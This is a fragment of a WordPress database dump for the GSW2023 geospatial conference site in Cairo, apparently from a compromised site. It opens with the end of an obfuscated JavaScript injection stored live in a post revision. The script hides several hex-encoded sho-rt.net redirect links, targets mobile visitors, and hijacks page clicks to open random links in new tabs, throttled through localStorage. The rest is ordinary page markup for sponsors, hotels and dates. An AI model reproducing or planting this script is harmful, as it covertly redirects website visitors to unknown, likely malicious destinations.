_0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-18 13:54:24','2023-06-18 13:54:24','',3066,'https://gsw2023.com/?p=4716',0,'revision','',0),
(4717,1,'2023-06-18 13:55:48','2023-06-18 13:55:48','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096263968{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686739986286{margin-top: -35px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345447550{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345389553{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"> </a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1686345510625{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096482028{margin-top: 88px !important;}\"]<a href=\"www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/4\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1685736118080{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"3/4\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1686350035719{margin-top: 190px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1687094969343{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][/vc_column][vc_column][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row content_placement=\"middle\" bg_type=\"image\" parallax_style=\"vcpb-default\" bg_image_new=\"id^3365|url^https://gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-1-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" bg_image_posiiton=\"0\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.58)\"][vc_column width=\"1/2\" css=\".vc_custom_1686320668385{margin-top: -25px !important;}\"][ultimate_heading main_heading=\"Important Dates\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-top:25px;margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]</p>\n<ul>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Camera ready paper submission: July 15, 2023 </strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Deadline for submission of travel grants funded by The ISPRS Foundation is: June 16, 2023</strong></span></h5>\n</li>\n<li style=\"text-align: left;\">\n<h5><span style=\"color: #ffffff;\"><strong>Early bird registration deadline: July 1, 2023</strong></span></h5>\n</li>\n</ul>\n<p>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][/vc_column][vc_column width=\"1/2\"][ultimate_heading main_heading=\"Invitation Letter\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" 